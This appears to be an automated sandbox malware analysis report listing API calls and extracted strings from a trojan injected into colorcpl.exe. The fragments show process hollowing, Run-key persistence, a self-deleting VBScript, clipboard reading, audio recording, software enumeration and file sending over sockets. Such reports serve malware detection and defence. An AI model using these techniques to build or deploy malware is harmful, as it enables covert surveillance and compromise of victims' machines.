                                                          • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,02FE27DB,?,00000000), ref: 02FE257E
                                                          • GetACP.KERNEL32(?,?,02FE27DB,?,00000000), ref: 02FE2593
                                                          Similarity
                                                          • API ID: InfoLocale
                                                          • String ID: ACP$OCP
                                                          • API String ID: 2299586839-711371036
                                                          APIs
                                                          • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 02FAB54A
                                                          • LoadResource.KERNEL32(00000000,?,?,02F9F419,00000000), ref: 02FAB55E
                                                          • LockResource.KERNEL32(00000000,?,?,02F9F419,00000000), ref: 02FAB565
                                                          • SizeofResource.KERNEL32(00000000,?,?,02F9F419,00000000), ref: 02FAB574
                                                          Similarity
                                                          • API ID: Resource$FindLoadLockSizeof
                                                          • String ID: SETTINGS
                                                          • API String ID: 3473537107-594951305
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 02F996A5
                                                          • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 02F9971D
                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 02F99746
                                                          • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 02F9975D
                                                          Similarity
                                                          • API ID: Find$File$CloseFirstH_prologNext
                                                          • String ID:
                                                          • API String ID: 1157919129-0
                                                          APIs
                                                            • Part of subcall function 02FD8295: GetLastError.KERNEL32(00000020,?,02FCA875,?,?,?,02FCF9F8,?,?,00000020,00000000,?,?,?,02FBDD92,0000003B), ref: 02FD8299
                                                            • Part of subcall function 02FD8295: _free.LIBCMT ref: 02FD82CC
                                                            • Part of subcall function 02FD8295: SetLastError.KERNEL32(00000000,02FCF9F8,?,?,00000020,00000000,?,?,?,02FBDD92,0000003B,?,00000041,00000000,00000000), ref: 02FD830D
                                                            • Part of subcall function 02FD8295: _abort.LIBCMT ref: 02FD8313
                                                            • Part of subcall function 02FD8295: _free.LIBCMT ref: 02FD82F4
                                                            • Part of subcall function 02FD8295: SetLastError.KERNEL32(00000000,02FCF9F8,?,?,00000020,00000000,?,?,?,02FBDD92,0000003B,?,00000041,00000000,00000000), ref: 02FD8301
                                                          • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 02FE279C
                                                          • IsValidCodePage.KERNEL32(00000000), ref: 02FE27F7
                                                          • IsValidLocale.KERNEL32(?,00000001), ref: 02FE2806
                                                          • GetLocaleInfoW.KERNEL32(?,00001001,02FD4AED,00000040,?,02FD4C0D,00000055,00000000,?,?,00000055,00000000), ref: 02FE284E
                                                          • GetLocaleInfoW.KERNEL32(?,00001002,02FD4B6D,00000040), ref: 02FE286D
                                                          Similarity
                                                          • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                          • String ID:
                                                          • API String ID: 745075371-0
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 02F9884C
                                                          • FindFirstFileW.KERNEL32(00000000,?,02FF6618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02F98905
                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 02F9892D
                                                          • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02F9893A
                                                          • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02F98A50
                                                          Similarity
                                                          • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                                          • String ID:
                                                          • API String ID: 1771804793-0
                                                          APIs
                                                          • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 02FACB68
                                                            • Part of subcall function 02FA37AA: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 02FA37B9
                                                            • Part of subcall function 02FA37AA: RegSetValueExA.KERNEL32(?,02FF74C8,00000000,?,00000000,00000000,030052F0,?,?,02F9F88E,02FF74C8,5.1.3 Pro), ref: 02FA37E1
                                                            • Part of subcall function 02FA37AA: RegCloseKey.KERNEL32(?,?,?,02F9F88E,02FF74C8,5.1.3 Pro), ref: 02FA37EC
                                                          Similarity
                                                          • API ID: CloseCreateInfoParametersSystemValue
                                                          • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                          • API String ID: 4127273184-3576401099
                                                          APIs
                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 02FCBC69
                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02FCBC73
                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 02FCBC80
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                          • String ID:
                                                          • API String ID: 3906539128-0
                                                          APIs
                                                          • OpenClipboard.USER32(00000000), ref: 02F9B74C
                                                          • GetClipboardData.USER32(0000000D), ref: 02F9B758
                                                          • CloseClipboard.USER32 ref: 02F9B760
                                                          Similarity
                                                          • API ID: Clipboard$CloseDataOpen
                                                          • String ID:
                                                          • API String ID: 2058664381-0
                                                          APIs
                                                          • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,02FA1F72,?,?,?,?,?), ref: 02FA2122
                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 02FA2129
                                                          Similarity
                                                          • API ID: Heap$FreeProcess
                                                          • String ID:
                                                          • API String ID: 3859560861-0
                                                          APIs
                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_00034BE4,02FC490B), ref: 02FC4BDD
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled
                                                          • String ID:
                                                          • API String ID: 3192549508-0
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 02FA8171
                                                          • GetProcAddress.KERNEL32(00000000), ref: 02FA8174
                                                          • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 02FA8185
                                                          • GetProcAddress.KERNEL32(00000000), ref: 02FA8188
                                                          • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 02FA8199
                                                          • GetProcAddress.KERNEL32(00000000), ref: 02FA819C
                                                          • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 02FA81AD
                                                          • GetProcAddress.KERNEL32(00000000), ref: 02FA81B0
                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 02FA8252
                                                          • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 02FA826A
                                                          • GetThreadContext.KERNEL32(?,00000000), ref: 02FA8280
                                                          • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 02FA82A6
                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 02FA8328
                                                          • TerminateProcess.KERNEL32(?,00000000), ref: 02FA833C
                                                          • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 02FA837C
                                                          • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 02FA8446
                                                          • SetThreadContext.KERNEL32(?,00000000), ref: 02FA8463
                                                          • ResumeThread.KERNEL32(?), ref: 02FA8470
                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 02FA8487
                                                          • GetCurrentProcess.KERNEL32(?), ref: 02FA8492
                                                          • TerminateProcess.KERNEL32(?,00000000), ref: 02FA84AD
                                                          • GetLastError.KERNEL32 ref: 02FA84B5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                           • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                          • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                          • API String ID: 4188446516-3035715614
                                                          APIs
                                                            • Part of subcall function 02FA288B: TerminateProcess.KERNEL32(00000000,pth_unenc,02F9F903), ref: 02FA289B
                                                            • Part of subcall function 02FA288B: WaitForSingleObject.KERNEL32(000000FF), ref: 02FA28AE
                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 02F9D558
                                                          • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 02F9D56B
                                                          • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 02F9D584
                                                          • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 02F9D5B4
                                                            • Part of subcall function 02F9B8E7: TerminateThread.KERNEL32(Function_0000A2B8,00000000,030052F0,pth_unenc,02F9D0F3,030052D8,030052F0,?,pth_unenc), ref: 02F9B8F6
                                                            • Part of subcall function 02F9B8E7: UnhookWindowsHookEx.USER32(030050F0), ref: 02F9B902
                                                            • Part of subcall function 02F9B8E7: TerminateThread.KERNEL32(02F9A2A2,00000000,?,pth_unenc), ref: 02F9B910
                                                            • Part of subcall function 02FAC482: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,02FAC5A1,00000000,00000000,?), ref: 02FAC4C1
                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,02FF6478,02FF6478,00000000), ref: 02F9D7FF
                                                          • ExitProcess.KERNEL32 ref: 02F9D80B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                           • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                          • String ID: """, 0$")$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                          • API String ID: 1861856835-1536747724
                                                          APIs
                                                          • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,030050E4,00000003), ref: 02FA24CF
                                                          • ExitProcess.KERNEL32(00000000), ref: 02FA24DB
                                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 02FA2555
                                                          • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 02FA2564
                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02FA256F
                                                          • CloseHandle.KERNEL32(00000000), ref: 02FA2576
                                                          • GetCurrentProcessId.KERNEL32 ref: 02FA257C
                                                          • PathFileExistsW.SHLWAPI(?), ref: 02FA25AD
                                                          • GetTempPathW.KERNEL32(00000104,?), ref: 02FA2610
                                                          • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 02FA262A
                                                          • lstrcatW.KERNEL32(?,.exe), ref: 02FA263C
                                                            • Part of subcall function 02FAC482: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,02FAC5A1,00000000,00000000,?), ref: 02FAC4C1
                                                          • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 02FA267C
                                                          • Sleep.KERNEL32(000001F4), ref: 02FA26BD
                                                          • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 02FA26D2
                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02FA26DD
                                                          • CloseHandle.KERNEL32(00000000), ref: 02FA26E4
                                                          • GetCurrentProcessId.KERNEL32 ref: 02FA26EA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                           • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                                          • String ID: .exe$WDH$exepath$open$temp_
                                                          • API String ID: 2649220323-3088914985
                                                          APIs
                                                          • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 02FAB1CD
                                                          • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 02FAB1E1
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,02FF60B4), ref: 02FAB209
                                                          • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,03004EE0,00000000), ref: 02FAB21F
                                                          • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 02FAB260
                                                          • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 02FAB278
                                                          • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 02FAB28D
                                                          • SetEvent.KERNEL32 ref: 02FAB2AA
                                                          • WaitForSingleObject.KERNEL32(000001F4), ref: 02FAB2BB
                                                          • CloseHandle.KERNEL32 ref: 02FAB2CB
                                                          • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 02FAB2ED
                                                          • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 02FAB2F7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                           • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                          • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
                                                          • API String ID: 738084811-1354618412
                                                          APIs
                                                            • Part of subcall function 02FA288B: TerminateProcess.KERNEL32(00000000,pth_unenc,02F9F903), ref: 02FA289B
                                                            • Part of subcall function 02FA288B: WaitForSingleObject.KERNEL32(000000FF), ref: 02FA28AE
                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,030052F0,?,pth_unenc), ref: 02F9D1E0
                                                          • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 02F9D1F3
                                                          • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,030052F0,?,pth_unenc), ref: 02F9D223
                                                          • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,030052F0,?,pth_unenc), ref: 02F9D232
                                                            • Part of subcall function 02F9B8E7: TerminateThread.KERNEL32(Function_0000A2B8,00000000,030052F0,pth_unenc,02F9D0F3,030052D8,030052F0,?,pth_unenc), ref: 02F9B8F6
                                                            • Part of subcall function 02F9B8E7: UnhookWindowsHookEx.USER32(030050F0), ref: 02F9B902
                                                            • Part of subcall function 02F9B8E7: TerminateThread.KERNEL32(02F9A2A2,00000000,?,pth_unenc), ref: 02F9B910
                                                            • Part of subcall function 02FABA09: GetCurrentProcessId.KERNEL32(00000000,75923530,00000000,?,?,?,?,02FF6478,02F9D248,.vbs,?,?,?,?,?,030052F0), ref: 02FABA30
                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,02FF6478,02FF6478,00000000), ref: 02F9D44D
                                                          • ExitProcess.KERNEL32 ref: 02F9D454
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                           • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                          • String ID: ")$.vbs$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                                                          • API String ID: 3797177996-3018399277
                                                          APIs
                                                          • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 02F91AD9
                                                          • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 02F91B03
                                                          • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 02F91B13
                                                          • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 02F91B23
                                                          • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 02F91B33
                                                          • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 02F91B43
                                                          • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 02F91B54
                                                          • WriteFile.KERNEL32(00000000,03002AAA,00000002,00000000,00000000), ref: 02F91B65
                                                          • WriteFile.KERNEL32(00000000,03002AAC,00000004,00000000,00000000), ref: 02F91B75
                                                          • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 02F91B85
                                                          • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 02F91B96
                                                          • WriteFile.KERNEL32(00000000,03002AB6,00000002,00000000,00000000), ref: 02F91BA7
                                                          • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 02F91BB7
                                                          • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 02F91BC7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                           • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$Write$Create
                                                          • String ID: RIFF$WAVE$data$fmt
                                                          • API String ID: 1602526932-4212202414
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\SysWOW64\colorcpl.exe,00000001,02F97688,C:\Windows\SysWOW64\colorcpl.exe,00000003,02F976B0,030052D8,02F97709), ref: 02F972BF
                                                          • GetProcAddress.KERNEL32(00000000), ref: 02F972C8
                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 02F972DD
                                                          • GetProcAddress.KERNEL32(00000000), ref: 02F972E0
                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 02F972F1
                                                          • GetProcAddress.KERNEL32(00000000), ref: 02F972F4
                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 02F97305
                                                          • GetProcAddress.KERNEL32(00000000), ref: 02F97308
                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 02F97319
                                                          • GetProcAddress.KERNEL32(00000000), ref: 02F9731C
                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 02F9732D
                                                          • GetProcAddress.KERNEL32(00000000), ref: 02F97330
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                           • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressHandleModuleProc
                                                          • String ID: C:\Windows\SysWOW64\colorcpl.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                          • API String ID: 1646373207-2523923970
                                                          APIs
                                                          • lstrlenW.KERNEL32(?), ref: 02FAC0C7
                                                          • _memcmp.LIBVCRUNTIME ref: 02FAC0DF
                                                          • lstrlenW.KERNEL32(?), ref: 02FAC0F8
                                                          • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 02FAC133
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 02FAC146
                                                          • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 02FAC18A
                                                          • lstrcmpW.KERNEL32(?,?), ref: 02FAC1A5
                                                          • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 02FAC1BD
                                                          • _wcslen.LIBCMT ref: 02FAC1CC
                                                          • FindVolumeClose.KERNEL32(?), ref: 02FAC1EC
                                                          • GetLastError.KERNEL32 ref: 02FAC204
                                                          • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 02FAC231
                                                          • lstrcatW.KERNEL32(?,?), ref: 02FAC24A
                                                          • lstrcpyW.KERNEL32(?,?), ref: 02FAC259
                                                          • GetLastError.KERNEL32 ref: 02FAC261
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                           • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                          • String ID: ?
                                                          • API String ID: 3941738427-1684325040
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                           • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$EnvironmentVariable$_wcschr
                                                          • String ID:
                                                          • API String ID: 3899193279-0
APIs
• RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 02FAC742
• RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 02FAC786
• RegCloseKey.ADVAPI32(?), ref: 02FACA50
Strings
Memory Dump Source
• Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
• Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
• API ID: CloseEnumOpen
• String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
• API String ID: 1332880857-3714951968
• Opcode ID: 26e0f1fe37615534b7e00599b7fc375a2baeb359655f372fce27cc6e8fd5b893
• Instruction ID: 10e87e6d532357b50d341108ef9804f19dc1be93a6fbcf7d7de8eef65c893d89
• Opcode Fuzzy Hash: 26e0f1fe37615534b7e00599b7fc375a2baeb359655f372fce27cc6e8fd5b893
• Instruction Fuzzy Hash: C28101715082459BE725EB60DC50EEFB7E9BF94384F50492EE78A82160FF30A949CF52
APIs
• DefWindowProcA.USER32(?,00000401,?,?), ref: 02FAD66B
• GetCursorPos.USER32(?), ref: 02FAD67A
• SetForegroundWindow.USER32(?), ref: 02FAD683
• TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 02FAD69D
• Shell_NotifyIconA.SHELL32(00000002,03004B48), ref: 02FAD6EE
• ExitProcess.KERNEL32 ref: 02FAD6F6
• CreatePopupMenu.USER32 ref: 02FAD6FC
• AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 02FAD711
Strings
Memory Dump Source
• Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
• Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
• API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
• String ID: Close
• API String ID: 1657328048-3535843008
• Opcode ID: 3ebd8f41f43b8cdec92491b41e07d4bc84d2a5a7520373fe429bb4da1c88d89f
• Instruction ID: 5c860818b536c3d3af0db0326c425a10b17c25956e1bab91897794455c5e0c11
• Opcode Fuzzy Hash: 3ebd8f41f43b8cdec92491b41e07d4bc84d2a5a7520373fe429bb4da1c88d89f
• Instruction Fuzzy Hash: 452139B294010CEFDF1A9FA9ED1EAA97F39EF04385F004514F706995A1D7B19920DF24
APIs
• ___free_lconv_mon.LIBCMT ref: 02FE138A
  • Part of subcall function 02FE0582: _free.LIBCMT ref: 02FE059F
  • Part of subcall function 02FE0582: _free.LIBCMT ref: 02FE05B1
  • Part of subcall function 02FE0582: _free.LIBCMT ref: 02FE05C3
  • Part of subcall function 02FE0582: _free.LIBCMT ref: 02FE05D5
  • Part of subcall function 02FE0582: _free.LIBCMT ref: 02FE05E7
  • Part of subcall function 02FE0582: _free.LIBCMT ref: 02FE05F9
  • Part of subcall function 02FE0582: _free.LIBCMT ref: 02FE060B
  • Part of subcall function 02FE0582: _free.LIBCMT ref: 02FE061D
  • Part of subcall function 02FE0582: _free.LIBCMT ref: 02FE062F
  • Part of subcall function 02FE0582: _free.LIBCMT ref: 02FE0641
  • Part of subcall function 02FE0582: _free.LIBCMT ref: 02FE0653
  • Part of subcall function 02FE0582: _free.LIBCMT ref: 02FE0665
  • Part of subcall function 02FE0582: _free.LIBCMT ref: 02FE0677
• _free.LIBCMT ref: 02FE137F
  • Part of subcall function 02FD6802: RtlFreeHeap.NTDLL(00000000,00000000,?,02FE0CEF,?,00000000,?,00000000,?,02FE0F93,?,00000007,?,?,02FE14DE,?), ref: 02FD6818
  • Part of subcall function 02FD6802: GetLastError.KERNEL32(?,?,02FE0CEF,?,00000000,?,00000000,?,02FE0F93,?,00000007,?,?,02FE14DE,?,?), ref: 02FD682A
• _free.LIBCMT ref: 02FE13A1
• _free.LIBCMT ref: 02FE13B6
• _free.LIBCMT ref: 02FE13C1
• _free.LIBCMT ref: 02FE13E3
• _free.LIBCMT ref: 02FE13F6
• _free.LIBCMT ref: 02FE1404
• _free.LIBCMT ref: 02FE140F
• _free.LIBCMT ref: 02FE1447
• _free.LIBCMT ref: 02FE144E
• _free.LIBCMT ref: 02FE146B
• _free.LIBCMT ref: 02FE1483
Memory Dump Source
• Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
• Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
• API ID: _free$ErrorFreeHeapLast___free_lconv_mon
• String ID:
• API String ID: 161543041-0
• Opcode ID: b7ac4c5754ed7a71d3221f8422c85e50c523b4023c0c978cf0dd69150d3982cb
• Instruction ID: 917c1e14b00980ae7d08b71d2d198145eca63ddd522f172ab02bd419d439912f
• Opcode Fuzzy Hash: b7ac4c5754ed7a71d3221f8422c85e50c523b4023c0c978cf0dd69150d3982cb
• Instruction Fuzzy Hash: 893164719003049FDF229A3AED45F5BB3EAAF01391F548929D65AD7690DF70AD409F20
APIs
• CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 02F98D1E
• GetFileSizeEx.KERNEL32(00000000,?), ref: 02F98D56
• __aulldiv.LIBCMT ref: 02F98D88
  • Part of subcall function 02F94AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 02F94B36
  • Part of subcall function 02FAB580: GetLocalTime.KERNEL32(00000000), ref: 02FAB59A
• SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 02F98EAB
• ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 02F98EC6
• CloseHandle.KERNEL32(00000000), ref: 02F98F9F
• CloseHandle.KERNEL32(00000000,00000052), ref: 02F98FE9
• CloseHandle.KERNEL32(00000000), ref: 02F99037
Strings
Memory Dump Source
• Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
• Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
